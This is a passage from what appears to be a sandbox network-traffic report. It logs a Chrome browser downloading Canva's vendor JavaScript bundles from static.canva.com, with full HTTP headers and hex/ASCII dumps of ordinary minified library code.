                                                                                                                                                                                                                                                    Data Ascii: ,"127.0.0.1"].includes(r.hostname)&&r.searchParams.get("pageLoadWorkerUrl"))return r.searchParams.get("pageLoadWorkerUrl");else return r.origin}async function w(e,r){const t=s();let a,l=0,u=[];try{a=self.navigator.serviceWorker}catch{}const d=c&&(null==a?
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 2e 76 65 6e 64 6f 72 2e 72 74 6c 2e 63 73 73 22 3a 31 35 33 36 31 2c 22 37 36 64 38 62 30 36 36 31 32 62 39 34 35 38 35 2e 76 65 6e 64 6f 72 2e 6a 73 22 3a 36 39 38 33 36 30 2c 22 34 32 65 64 61 63 64 61 35 33 66 36 38 66 65 65 2e 6c 74 72 2e 63 73 73 22 3a 34 38 32 37 2c 22 65 64 33 37 38 31 63 35 63 31 63 63 30 63 37 35 2e 6a 73 22 3a 31 34 38 35 34 35 2c 22 64 65 37 35 32 36 62 36 36 63 35 39 39 62 35 36 2e 72 74 6c 2e 63 73 73 22 3a 34 38 32 38 2c 22 61 36 39 65 36 64 63 36 31 32 31 34 36 63 37 34 2e 6a 73 22 3a 37 36 31 32 34 2c 22 31 66 62 37 34 62 32 39 35 66 63 39 36 65 64 33 2e 6c 74 72 2e 63 73 73 22 3a 37 34 32 38 2c 22 35 31 64 37 63 33 66 36 64 32 63 33 37 32 39 38 2e 6a 73 22 3a 33 38 37 33 31 2c 22 33 32 32 36 33 38 30 39 65 36 65 36 63 37
                                                                                                                                                                                                                                                    Data Ascii: .vendor.rtl.css":15361,"76d8b06612b94585.vendor.js":698360,"42edacda53f68fee.ltr.css":4827,"ed3781c5c1cc0c75.js":148545,"de7526b66c599b56.rtl.css":4828,"a69e6dc612146c74.js":76124,"1fb74b295fc96ed3.ltr.css":7428,"51d7c3f6d2c37298.js":38731,"32263809e6e6c7


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    5192.168.2.449748104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC570OUTGET /web/76d8b06612b94585.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1357INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 205707
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79e86a0b8cc0-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 246929
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "2a1f2d039cb106b389c63aa919cb4db8"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:07 GMT
                                                                                                                                                                                                                                                    Last-Modified: Tue, 17 Dec 2024 00:45:39 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 18 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: lKhdgTKV7LR+VQ3xqhm6V2iDPvqexAusi7xbgiv4Vwp+McaXKG3B4aWsekEGjmvnD+6GYYpFnUdfnUONQAQV3yzGPJGuDul/VUxP/BRzHA4=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: CCS7DDDGAK3MG8CG
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: b4znDo1h0h06t7QZ4ai4rGRO41dp.nw4
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC808INData Raw: 58 2d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2d 4f 70 74 69 6f 6e 73 3a 20 6e 6f 73 6e 69 66 66 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 70 5f 6c 36 62 59 43 33 56 44 44 4a 4f 66 42 46 31 43 35 79 6e 63 58 48 79 6e 52 4b 36 43 66 43 36 73 79 67 67 2e 78 74 31 63 30 2d 31 37 33 34 36 34 33 36 34 31 2d 31 2e 30 2e 31 2e 31 2d 39 63 74 65 42 49 48 62 2e 4d 65 32 63 42 54 55 4b 74 57 34 69 4b 72 41 54 52 63 78 59 32 46 69 4c 35 56 49 64 66 51 33 75 36 30 43 63 32 6e 51 4c 32 4a 5f 79 6a 55 69 45 50 73 58 32 42 72 78 46 55 55 64 6c 53 6c 56 33 32 53 2e 4c 6b 75 51 4b 62 6e 35 6a 67 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 32 31 20 47 4d 54 3b 20 64 6f 6d 61 69 6e
                                                                                                                                                                                                                                                    Data Ascii: X-Content-Type-Options: nosniffSet-Cookie: __cf_bm=p_l6bYC3VDDJOfBF1C5yncXHynRK6CfC6sygg.xt1c0-1734643641-1.0.1.1-9cteBIHb.Me2cBTUKtW4iKrATRcxY2FiL5VIdfQ3u60Cc2nQL2J_yjUiEPsX2BrxFUUdlSlV32S.LkuQKbn5jg; path=/; expires=Thu, 19-Dec-24 21:57:21 GMT; domain
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 37 36 64 38 62 30 36 36 31 32 62 39 34 35 38 35 2e 76 65 6e 64 6f 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 36 35 33 5d 2c 7b 32 38 36 34 34 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 51 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 72 3d 6e 28 32 33 39 34 31 32 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 6e 3d 65 2e
                                                                                                                                                                                                                                                    Data Ascii: /*! For license information please see 76d8b06612b94585.vendor.js.LICENSE.txt */"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2653],{286447:(e,t,n)=>{n.d(t,{Q:()=>a});var r=n(239412);function a(e){var t=e.children,n=e.
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 2e 20 54 68 65 20 6f 62 73 65 72 76 65 72 20 61 6c 72 65 61 64 79 20 61 70 70 6c 69 65 73 20 27 52 65 61 63 74 2e 6d 65 6d 6f 27 20 66 6f 72 20 79 6f 75 2e 22 29 3b 69 66 28 28 30 2c 6f 2e 46 29 28 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 66 6f 72 77 61 72 64 52 65 66 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 26 26 6e 2c 61 3d 65 2c 75 3d 65 2e 64 69 73 70 6c 61 79 4e 61 6d 65 7c 7c 65 2e 6e 61 6d 65 3b 69 66 28 63 26 26 65 2e 24 24 74 79 70 65 6f 66 3d 3d 3d 63 26 26 28 72 3d 21 30 2c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 28 61 3d 65 2e 72 65 6e 64 65 72 29 29 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 5b 6d 6f 62 78 2d 72 65 61 63 74 2d 6c
                                                                                                                                                                                                                                                    Data Ascii: . The observer already applies 'React.memo' for you.");if((0,o.F)())return e;var r=null!==(n=null==t?void 0:t.forwardRef)&&void 0!==n&&n,a=e,u=e.displayName||e.name;if(c&&e.$$typeof===c&&(r=!0,"function"!=typeof(a=e.render)))throw new Error("[mobx-react-l
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 65 2e 72 65 61 63 74 69 6f 6e 3d 6e 65 77 20 72 2e 6c 65 28 22 6f 62 73 65 72 76 65 72 22 2e 63 6f 6e 63 61 74 28 65 2e 6e 61 6d 65 29 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3b 65 2e 73 74 61 74 65 56 65 72 73 69 6f 6e 3d 53 79 6d 62 6f 6c 28 29 2c 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 6f 6e 53 74 6f 72 65 43 68 61 6e 67 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 63 61 6c 6c 28 65 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 22 6f 62 73 65 72 76 65 64 22 29 2c 28 30 2c 6f 2e 46 29 28 29 29 72 65 74 75 72 6e 20 65 28 29 3b 76 61 72 20 6e 3d 61 2e 75 73 65 52 65 66 28 6e 75 6c 6c 29 3b 69 66 28 21 6e 2e 63 75 72 72 65 6e
                                                                                                                                                                                                                                                    Data Ascii: function s(e){e.reaction=new r.le("observer".concat(e.name),(function(){var t;e.stateVersion=Symbol(),null===(t=e.onStoreChange)||void 0===t||t.call(e)}))}function c(e,t){if(void 0===t&&(t="observed"),(0,o.F)())return e();var n=a.useRef(null);if(!n.curren
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 64 20 30 3b 76 61 72 20 6e 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 74 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 73 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 72 2c 61 29 7b 6e 2d 72 2e 72 65 67 69 73 74 65 72 65 64 41 74 3e 3d 65 26 26 28 74 2e 66 69 6e 61 6c 69 7a 65 28 72 2e 76 61 6c 75 65 29 2c 74 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 73 2e 64 65 6c 65 74 65 28 61 29 29 7d 29 29 2c 74 2e 72 65 67 69 73 74 72 61 74 69 6f 6e 73 2e 73 69 7a 65 3e 30 26 26 74 2e 73 63 68 65 64 75 6c 65 53 77 65 65 70 28 29 7d 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 68 69 73 2c 22 66 69 6e 61 6c 69 7a 65 41 6c 6c 49 6d 6d 65 64 69 61 74 65 6c 79 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c
                                                                                                                                                                                                                                                    Data Ascii: d 0;var n=Date.now();t.registrations.forEach((function(r,a){n-r.registeredAt>=e&&(t.finalize(r.value),t.registrations.delete(a))})),t.registrations.size>0&&t.scheduleSweep()}}),Object.defineProperty(this,"finalizeAllImmediately",{enumerable:!0,configurabl
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 65 28 29 2c 65 2e 72 65 61 63 74 69 6f 6e 3d 6e 75 6c 6c 7d 29 29 7d 2c 32 32 39 39 30 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 65 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 72 3d 6e 28 34 32 37 38 32 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 72 2e 47 66 29 28 65 29 7d 7d 2c 38 39 38 37 39 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 6d 3a 28 29 3d 3e 72 2e 75 6e 73 74 61 62 6c 65 5f 62 61 74 63 68 65 64 55 70 64 61 74 65 73 7d 29 3b 76 61 72 20 72 3d 6e 28 32 30 34 33 35 38 29 7d 2c 34 32 37 38 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 24 24 3a 28 29 3d 3e 4b 65 2c 45 48 3a 28 29 3d 3e 48 74 2c 45 69 3a 28 29 3d 3e 71 6e 2c 46 6c 3a 28 29 3d 3e 56 65 2c 47 66 3a 28 29 3d 3e 72 6e 2c
                                                                                                                                                                                                                                                    Data Ascii: e(),e.reaction=null}))},229907:(e,t,n)=>{n.d(t,{e:()=>a});var r=n(42782);function a(e){return(0,r.Gf)(e)}},898793:(e,t,n)=>{n.d(t,{m:()=>r.unstable_batchedUpdates});var r=n(204358)},42782:(e,t,n)=>{n.d(t,{$$:()=>Ke,EH:()=>Ht,Ei:()=>qn,Fl:()=>Ve,Gf:()=>rn,
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 29 7d 7d 76 61 72 20 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 79 28 65 29 7b 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 65 29 7b 63 61 73 65 22 73 74 72 69 6e 67 22 3a 63 61 73 65 22 73 79 6d 62 6f 6c 22 3a 63 61 73 65 22 6e 75 6d 62 65 72 22 3a 72 65 74 75 72 6e 21 30 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 69 66 28 21 62 28 65 29 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74
                                                                                                                                                                                                                                                    Data Ascii: )}}var g=function(){};function m(e){return"function"==typeof e}function y(e){switch(typeof e){case"string":case"symbol":case"number":return!0}return!1}function b(e){return null!==e&&"object"==typeof e}function _(e){if(!b(e))return!1;var t=Object.getProtot
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 6e 5d 3d 6c 28 65 2c 6e 29 7d 29 29 2c 74 7d 3b 66 75 6e 63 74 69 6f 6e 20 4c 28 65 2c 74 29 7b 72 65 74 75 72 6e 21 21 28 65 26 74 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 3f 65 7c 3d 74 3a 65 26 3d 7e 74 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 7a 28 65 2c 74 29 7b 28 6e 75 6c 6c 3d 3d 74 7c 7c 74 3e 65 2e 6c 65 6e 67 74 68 29 26 26 28 74 3d 65 2e 6c 65 6e 67 74 68 29 3b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 41 72 72 61 79 28 74 29 3b 6e 3c 74 3b 6e 2b 2b 29 72 5b 6e 5d 3d 65 5b 6e 5d 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 72 3d 74 5b 6e 5d 3b 72 2e 65 6e 75 6d 65 72 61 62 6c 65
                                                                                                                                                                                                                                                    Data Ascii: n]=l(e,n)})),t};function L(e,t){return!!(e&t)}function R(e,t,n){return n?e|=t:e&=~t,e}function z(e,t){(null==t||t>e.length)&&(t=e.length);for(var n=0,r=Array(t);n<t;n++)r[n]=e[n];return r}function M(e,t){for(var n=0;n<t.length;n++){var r=t[n];r.enumerable
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 6c 6c 2c 61 72 67 75 6d 65 6e 74 73 29 7d 66 75 6e 63 74 69 6f 6e 20 56 28 65 2c 74 29 7b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 29 2c 65 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 65 2c 46 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 46 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2e 62 69 6e 64 28 29 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 2c 65 7d 2c 46 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 55 28 65 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74
                                                                                                                                                                                                                                                    Data Ascii: ll,arguments)}function V(e,t){e.prototype=Object.create(t.prototype),e.prototype.constructor=e,F(e,t)}function F(e,t){return F=Object.setPrototypeOf?Object.setPrototypeOf.bind():function(e,t){return e.__proto__=t,e},F(e,t)}function U(e){var t=function(e,t
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1369INData Raw: 29 2c 45 74 28 74 68 69 73 29 2c 53 74 28 29 7d 2c 74 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6e 61 6d 65 5f 7d 2c 44 28 65 2c 5b 7b 6b 65 79 3a 22 69 73 42 65 69 6e 67 4f 62 73 65 72 76 65 64 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 28 74 68 69 73 2e 66 6c 61 67 73 5f 2c 65 2e 69 73 42 65 69 6e 67 4f 62 73 65 72 76 65 64 4d 61 73 6b 5f 29 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 68 69 73 2e 66 6c 61 67 73 5f 3d 52 28 74 68 69 73 2e 66 6c 61 67 73 5f 2c 65 2e 69 73 42 65 69 6e 67 4f 62 73 65 72 76 65 64 4d 61 73 6b 5f 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 69 73 50 65 6e 64 69 6e 67 55 6e 6f 62 73 65 72 76 61 74 69 6f 6e 22 2c 67 65 74 3a 66 75 6e 63
                                                                                                                                                                                                                                                    Data Ascii: ),Et(this),St()},t.toString=function(){return this.name_},D(e,[{key:"isBeingObserved",get:function(){return L(this.flags_,e.isBeingObservedMask_)},set:function(t){this.flags_=R(this.flags_,e.isBeingObservedMask_,t)}},{key:"isPendingUnobservation",get:func


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    6192.168.2.449744104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC570OUTGET /web/a539f22cb4b4cc9e.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC1357INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:21 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 370795
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a79e86a45439d-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Age: 71360
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "74c9deb0cfd613ebf0b30cb5899fbc72"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:07 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:54 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: 8+gwjnlONJZqUrLfFDNsPa4l5SHAIG1zCzxQtfC25XpoXgT5oGbB/PPaaf5jTI8wyU/AzB4F/QI=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: RB5SY5DGR3RSH2VM
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: uYT2hMkwD6fYplh2npPq7VkieXzg0qpW
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC779INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 6b 32 37 74 45 4d 48 44 57 4c 61 7a 4d 51 67 32 4f 61 61 6d 6d 58 56 37 6d 31 38 53 34 4c 53 32 78 49 6c 5a 6e 7a 4f 45 75 69 51 2d 31 37 33 34 36 34 33 36 34 31 2d 31 2e 30 2e 31 2e 31 2d 56 5f 63 34 41 54 49 5f 2e 4e 33 42 48 69 5a 48 50 48 33 72 69 39 39 35 4f 59 63 50 55 70 41 70 6d 74 67 59 35 51 7a 6d 47 2e 57 45 5a 54 64 31 75 6e 63 6f 4c 47 57 45 36 57 49 45 5a 71 39 5a 31 51 6c 76 70 65 4c 52 75 59 51 62 4e 43 30 4d 4e 57 35 47 75 67 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 54 68 75 2c 20 31 39 2d 44 65 63 2d 32 34 20 32 31 3a 35 37 3a 32 31 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=k27tEMHDWLazMQg2OaammXV7m18S4LS2xIlZnzOEuiQ-1734643641-1.0.1.1-V_c4ATI_.N3BHiZHPH3ri995OYcPUpApmtgY5QzmG.WEZTd1uncoLGWE6WIEZq9Z1QlvpeLRuYQbNC0MNW5Gug; path=/; expires=Thu, 19-Dec-24 21:57:21 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                    2024-12-19 21:27:21 UTC602INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 61 35 33 39 66 32 32 63 62 34 62 34 63 63 39 65 2e 76 65 6e 64 6f 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 34 33 36 5d 2c 7b 39 36 38 3a 74 3d 3e 7b 76 61 72 20 65 3b 77 69 6e 64 6f 77 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78
                                                                                                                                                                                                                                                    Data Ascii: /*! For license information please see a539f22cb4b4cc9e.vendor.js.LICENSE.txt */(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{968:t=>{var e;window,e=function(){return function(t){var e={};function n(r){if(e[r])return e[r].ex
